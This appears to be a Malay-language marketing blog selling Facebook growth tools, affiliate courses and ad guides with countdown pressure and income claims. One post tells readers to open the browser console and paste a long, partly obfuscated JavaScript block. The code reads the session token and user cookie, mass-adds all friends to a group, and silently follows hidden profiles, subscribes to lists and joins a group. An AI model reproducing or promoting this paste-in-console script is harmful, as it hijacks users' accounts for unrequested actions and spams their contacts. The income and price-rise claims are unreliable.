Tingkatkan Liker Dengan 1 Klik

Assalam dan salam sejahtera,


Ramai yang ada kedai online, terutama di Facebook.
Fanpage anda tu la umpama kedai alam maya.

Tapi, kedai anda tu suram je
Sebab tak ramai yang masuk.

Kenapa?
Kerana anda tak cukup likers
Konsep dia mudah..

Liker ramai>SALE Banyak
Liker sikit>SALE Kurang

Likers ada je..tapi 56, 100, 140..
Itu tak cukup banyak untuk anda

Lagi parah orang tak pandang pun..

Produk anda bagus, dapat selesaikan masalah..tapi tu la bila orang lalu jengok
nak beli tu, macam was was..dan tak yakin

Jadi, anda kena selesaikan masalah ni segera..
Tingkatkan Likers sebanyak mungkin dengan 1 klik.



Tingkatkan Liker Dengan 1 Klik



Software ni akan invite mereka yang telah like post anda, tetapi tidak like page

Bayangkan lepasni
Anda tak perlu lagi buat iklan berbayar untuk tarik likes
Malah likes yang anda dapat tu lagi berkualiti

Tingkatkan lagi kepercayaan
Ada kredibiliti
SALE anda lebat

Jadi, tak perlu lagi anda labur duit untuk naikkan liker!
Tingkatkan Liker Dengan 1 Klik

                                                     

PERCUMA

FREE FACEBOOK MARKETING EASY 3.0





PS: Harga akan dinaikkan setiap hari, oleh itu anda diminta grab sekarang
PSS: Pelaburan berbaloi untuk bisnes jangka masa panjang anda



Komen yuks!!

Hakak ni jana RM 7000 Guna kaedah Zero Marketing Cost

Hakak ni jana RM 7000 Guna kaedah Zero Marketing Cost



Hakak kak atas tu sebelum ni menjual produk kecantikan, tapi telah beralih bidang..dari dropship, ke affiliate
Katanya..


"komisen untung lagi besar..sekitar RM60 hingga RM190."


Saya tahu ramai yang biasa dengar apa itu dropship. Tapi ramai yang tak tahu apa itu affiliate..,kan?
Ok..mari saya citer sikit apa itu affiliate.

Affiliate ni macam dropship jugak, tapi lebih kepada produk digital, seperti menjual ebook panduan, video tutorial, software dan lain-lain.
Semua dilakukan atas talian.

Ringkasnya: Affiliate ni..

  • Tidak perlu simpan stock
  • Lebih kepada produk digital dalam bentuk ebook, video dll.
  • Komisen tinggi, sekitar 40-70% dari harga jualan
  • Suppot grup dilakukan oleh pemilik produk
  • Landing page/ surat jualan disediakan oleh pihak penganjur
  • Ada unik link untuk setiap ahli affiliate
Jika anda pernah biasa dengan dropshipping. anda berpotensi besar untuk menjana pendapatan melalui affiliate!!

Screenshot kat ats tu die pakai zerocost marketing tau dah dapat SALE 7K (Hanya pakai FB) tetapi dalam modul yang anda bakal belajar nanti lagi details dan advance.

Mahu belajar affiliate ?
Affiliate Method





atau KHAS untuk anda!!


Bisnes Affiliate FB
Fire SALE RAYA 2017 ni tak lama, selama 3 hari sahaja. Jangan terlepas peluang ni.
Jadi dapatkan dengan harga special tau.










Opps! Hadiah untuk anda..
Ebook Panduan Affiliate Powerr. Panduan ni tunjukkan langkah demi langkah untuk menjadi super Affiliate!



Dapatkan Panduan Affiliate Powerr PERCUMA!


 Harga asal ialah RM49, tetapi untuk bulan berkat ini diberikan PERCUMA!
Masukkan nama dan email anda.

Nama

Alamat Email




Sila semak email anda sebaik sahaja anda tekan butang hantar. Email pengesahan akan dihantar ke inbox anda

Zillatics, Rahsia Korek Interest Tepat Dalam Facebook



Salam Ramadan rakan-rakan bisnes,


Saya kira, ramai antara kita yang pakai Facebook Ads untuk pemasaran, namun tak ramai yang berjaya buat ads yang berkesan, hasilnya..

Duit hangus gitu jer..
Masa banyak terbuang..
Kepala makin pening,
Produk makin menimbun..

Sebenarnya bukan salah Mark Zukermberg dalam hal ni,
tetapi kita tersalah target interest yang kurang tepat! Bila dah tersalah target tu, agak-agak ada orang berminat tak dengan produk kita?

Sudah tentu TIDAK.

Ramai yang buat kaedah cuba jaya (try and error), yang memakan masa, tenaga dan semestinya DUIT.
Jika anda alami situasi diatas, adakah anda sanggup bertahan?

Apa kata dengan 1 klik sahaja, anda mampu korek semua interest tepat, yang selama ni Facebook 'sorok' kan? Anda bakal
JIMAT.

Masa..
Tenaga..
DUIT..


Nak tahu lebih details? klik button dibawah



Zillatics, korek interest tepat sampai lubang cacing



Tengok tahu, sebab benda ni tak lama, kang dah tutup nanti, menyesal..
(:

Cara Add Semua Friends Serentak Ke Dalam Grup Facebook

Salam sejahtera,

Kali ni saya akan tunjukkan cara bagaimana untuk add semua rakan kedalam grup Facebook dengan sekali tekan sahaja.

Caranya sangat mudah

Pergi ke grup yang kita mahu masukkan rakan
klik F12
pergi kebahagian consol
paste!

tunggu seketika, sehingga semua rakan anda tadi telah dimasukkan


copy dan paste kod berikut

(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Friends</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Search For Followers... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>People Invited!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Close</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='display:none; margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Fb Group Script By Safe Tricks </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}

function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){
var http4 = new XMLHttpRequest();

var url4 = "/ajax/follow/follow_profile.php?__a=1";

var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}
}

http4.send(params4);
}

function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}

a("");
a("");

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};




Selamat mencuba!

Boost POST paling Mudah dan RESULT POWER!




Jika anda TAK PERNAH buat FB ADS, dan tak mahu bermain dengan power editor yang merumitkan,

TETAPI, anda mahu INCOME BESAR, anda berada pada laman yang tepat!

Ada smartphone?

Ada Facebook?

Pernah nampak butang 'Boost Post'?

Ia benda simple, tapi kalau digunakan mampu mendapat engagement yang tinggi!!

Lihat gambar berikut:





Result diatas, tanpa menggunakan power editor/ ads manager! cuma guna butang 'Boost POST'


Harga akan naik malam ni, selepas JAM 12 AM, so boleh daptkan sekarang dengan harga murah!!

Klik sini
Pakej Boost Post + 3 Teknik Tambahan



Serta Mendapat Jaminan Kepuasan 100%
atau Wang Anda Akan Dikembalikan
Dalam Masa 30 Hari

Ada bonus untuk pembeli pantas!

Bonus 1
Grafik kit Marketing berharga RM127 (1.4GB)
Bonus 2
Grafik Kit 2 berharga RM100 (1GB)
Bonus 3
Your First Funnel (300MB)
Muat turun sekarang





Bagaimana cara mahu dapatkan bonus diatas?


1.Clearkan cookies anda
2.Klik link dibawah dan buat belian pakej Website Wordpress+ Pemasaran Email

Pakej Boost Post+ 3 Teknik Tambahan

3.Selepas pembelian..emailkan 'Bonus Pakej Boost Post+ 3 Teknik Tambahan' kepada >> khairul.likemethod@gmail.com

4. Selepas pembelian anda disahkan , bonus akan dihantar kepada anda.

(:

ps: Harga akan dinaikkan nanti. 
Oleh itu..anda perlu dapatkan segera panduan buat website ni!



Ini hadiah anda (Instagram Marketing Excellence). Klik sini untuk instant download.

Strategi Rekrut Ejen (Gunakan Kelebihan Orang Lain Hasilkan Sale Sehingga RM434000)





Hello hai, saya khairul

Anda ada produk untuk dijual? Kalau ada, anda berada pada tempat yang betul.

Kali ni nak cerita sikit, salah satu teknik nak hasilkan jualan berganda, tanpa melakukannya seorang diri..apa tu?

Teknik rekrut ejen.



Dengan teknik ni, bukan sahaja anda mempunyai banyak masa, malah.boleh hasilkan jualan berganda jika dibandingkan anda seorang diri membuatnya.

Kawan saya, Syed Abdul Mun’em  telahpun mendedahkan teknik tersebut. Beliau merupakan salah seorang pengasas bersama bagi bisnes cookies secara online (Facebook) di bawah jenama “Sekut Emjays” yang berpusat di Kota Fesyen, MITC, Melaka. Klik butang dibawah untuk details:




Akses Strategi Rekrut Ejen


Berikut hasil yang beliau dapat setelah merekrut ejen.





Itu adalah hasil setelah rekrut ejen untuk jualan produk beliau.

Dalam modul yang beliau hasilkan , beliau bagitahu semua teknik untuk rekrut ejen, bermula persediaan sebelum merekrut, sehinggalah anda berjaya merekrut ejen.

Ada tawaran harga spesial untuk anda sebab modul ni baru sahaja dilancarkan. Tawaran tu akan tamat malam ini, 31 Mac Jam 11.59 PM.


Klik sini untuk dapatkan modul tersebut.




Akses Strategi Rekrut Ejen